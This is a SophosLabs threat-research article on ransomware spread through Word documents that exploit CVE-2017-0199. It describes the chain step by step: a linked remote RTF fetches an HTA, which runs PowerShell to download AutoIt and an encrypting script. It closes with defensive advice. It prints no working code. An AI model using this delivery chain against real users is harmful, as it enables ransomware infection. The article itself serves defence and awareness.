SophosLabs analysis: why the surge in Word docs hiding ransomware?

Thanks to Graham Chantry of SophosLabs for the behind-the-scenes work on this article.

Most media attention tends to focus on the new, unique attack techniques. But for security practitioners dealing with clear and present day-to-day threats, many problems continue to involve the old-fashioned stuff, like malware hiding in Microsoft Office documents.

SophosLabs researchers see that reality in the deluge of malicious docs the bad guys continue to throw at users. The last few weeks have proven especially busy on that front, with the migration of VBA Malware to PDF, a mouse-over PowerPoint infection and the adoption of CVE-2017-0199 into Exploit builder kits.

In the latter case, SophosLabs has seen a drastic increase in malware exploiting the CVE-2017-0199 vulnerability. According to principal researcher Gábor Szappanos, it now accounts for three of every four document exploit samples labs has seen:


Generally, CVE-2017-0199 campaigns are distributed in spam emails where the attachment is the exploited RTF file. More recent ransomware campaigns, however, have used an old trick in Word documents to help conceal the presence of the exploit.

Old trick, fresh fruit

The trick is to host the exploited RTF on a server and embed a link to it in a standard Word attachment. When Word opens this document, it will automatically download the exploited RTF and trigger the infection process.

This is achieved using an OLEObject, which is the same mechanism used to include such other content as Excel spreadsheets or Visio drawings within your document. Instead of housing the spreadsheet/drawing in the document file itself, the object is instead linked to an internet address.

The spam campaigns these samples are distributed in usually center their social engineering around some form of debt collection.

The screenshot above is a typical example. Note the attachment “INV #00000000.docx”. A .docx extension indicates the file is saved in the Office 2007 format. Documents in this format are ZIP files containing a variety of other file types that help define the document’s content.

The spine of any Office 2007 file is the document.xml file and a quick look at its contents in a text editor shows this file does indeed have an embedded OLEObject. The actual contents of OLEObjects are defined in another XML file within the Zip: document.xml.rels. An object’s declaration and definition are linked via a unique ID.

In this case, our OLEobject is identified as rId8 (highlighted in red). As you can see, our object (called yourdoc.doc) is stored on a remote server (pointed to by an IP address).

When the victim opens “INV #00000000.docx”, Word will automatically download the file from the given IP address without any form of confirmation. In fact, the only sign of anything untoward is a very short-lived “Downloading” message which is displayed in the Word splash screen:

Wait a minute… What did it just download?

Once “yourdoc.doc” has been downloaded, Word displays the fake invoice.

There’s no obvious sign of anything malicious, so one must look at the network traffic to see what was downloaded. As the screenshot below shows, yourdoc.doc was not a Word document, as the file extension suggested, but actually an RTF file. This isn’t a problem, however, as Word fully understands the file format so it’s simply a case of rending its contents.

The RTF file contains only an embedded object (signified by the {\object keyword). The section highlighted in red is a sequence of ASCII characters that represent the hexadecimal values of each byte in the embedded file. The bytes d0 cf 11 e0 a1 b1 1a e1 indicate the embedded file is in the OLE format.

When we open the embedded file in an OLE parser (seen at the bottom of the screenshot) we can see that it too has content stored remotely. In fact it’s the same IP address we downloaded this RTF from.

The file being downloaded this time, however, isn’t a document. The HTA file extension indicates it’s attempting to download an HTML application. The HTML Application file format was originally designed to allow scripting languages such as VBScript and JScript to be paired with HTML designed user interfaces. Unfortunately, the format has also served as a reliable vehicle for delivering malicious payloads, such as the all too common JavaScript downloader campaigns and of course CVE-2017-0199.

When we jump back to Word, we can see the downloaded RTF file has now been rendered and the request to download the HTA has been intercepted.

Unlike that first RTF download, Word decides to suspend this HTA download and instead prompts the user for their consent before doing so.

While it’s undeniably a good thing that Office has asked for confirmation before loading additional content, it doesn’t really give us the full picture. It doesn’t, for example, tell us what type of file is being loaded, or where the file in question is being downloaded from – and, most crucially, that allowing this file to be loaded could be potentially very dangerous.

This is in great contrast to the warnings Office issues when the user is attempting to enable macros or when they’re attempting to open a file embedded within the document itself (as seen below).

If you’re a user who panics at the thought of final notices for unpaid bills, you might not think twice about clicking “Yes” – and this prompt simply doesn’t state how disastrous the consequences might be.

Downloading the payload

If the victim does press “Yes”, the HTA is downloaded and thanks to CVE-2017-0199 is now running invisibly to the user.

So what exactly does that downloaded HTA do? Looking at the network traffic, we find it consists of a very simplistic VBScript:

The two lines of interest are lines 3 and 4: the former creating a shell object and the latter using it to launch a PowerShell command. Note the –c command line option which directs PowerShell to execute the proceeding commands.

The screenshot below shows a more readable version of what this PowerShell command is actually doing.

Lines 2 and 3 create URI addresses to two separate files: one a Windows Executable (au0.exe) and the other an AutoIt script (sc0.au3).

Lines 4 and 5 are determining locations on the victim’s machines to download the aforementioned files.

Lines 6 and 7 download the files to their given locations.

Line 8 runs the downloaded executable with the AutoIt script as an argument.

What is AutoIt?

AutoIt is a scripting language designed to automate routine tasks. What separates AutoIt from the more commonly known scripting languages, such as Perl and Python, is the ability to simulate keystrokes and mouse movement. This can be incredibly useful when, say, testing a graphical user interface.

The Windows executable that is downloaded is a legitimate version of the AutoIt interpreter. The malware downloads this just in case the victim does not have AutoIt installed, and of course, this is required for the script payload to run.

When the AutoIt script is run, it proceeds to loop through the files on the victim’s machine, finding ones of interest and encrypting them.  Files encrypted include the usual targets such as documents, images and videos, but also saves from games such as Minecraft, Assassins Creed and DayZ, as well as Passbook files and Python scripts:

Unlike more common ransomware such as Locky, Zepto and Jaff, this family doesn’t add an extension to the encrypted files: it instead adds its calling card to the start of the filename:

And, of course, the obligatory ransom note informs the user of the steps they must take in order to retrieve their files:


Using remote content in Word documents is certainly nothing new – it’s been around for a very long time. Some of the old school self-replicating viruses used this trick by declaring a macro template that was stored on a remote server. What makes this trend more interesting is it’s the first time we’ve seen it used consistently with more modern threats.

The advantages to the bad guys are obvious. By keeping the actual exploited document on their own server, they control the initial stages of the attack. If at any point they decide to kill the attack they can take the server down and the SPAM’ed document will no longer work.

Likewise AV vendors will not be able to see the actual malicious content when they first scan the document attachment. So there is no easy way of knowing whether the content to be downloaded is a genuine document or a malicious one. Of course AV will get its chance to scan the file, when it’s downloaded, so it’s more a case of delaying than denying.

Breaking the attack up into different stages is also a nice way of concealing the overall picture of what the malware is trying to achieve. This infection chain started with a Word document, which downloaded an exploited RTF, which downloaded a HTA, which executed PowerShell, which then downloaded and executed an AutoIt payload:

The advantage of modern-day antivirus, however, is that it isn’t just one bite of the cherry any more: there are many different layers of detection. So if detection isn’t reported for the original attachment, there is a very good chance it will detect on either the links in the chain or even the process itself.

Defensive measures

Microsoft patched the vulnerability in April and those who haven’t applied it must do so. But there are other things one can do for a more robust defense:

  • If you receive a Word document by email and don’t know the person who sent it, DON’T OPEN IT.
  • Use an anti-virus with an on-access scanner (also known as real-time protection). This can help you block malware of this type in a multi-layered defense, for example, by stopping the initial booby-trapped word file.
  • Consider stricter email gateway settings. Some staff are more exposed to malware-sending crooks than others (such as the order processing department), and may benefit from more stringent precautions, rather than being inconvenienced by them.
  • Never turn off security features because an email or document says so. Documents such as invoices, courier advisories and job applications should be legible without macros enabled.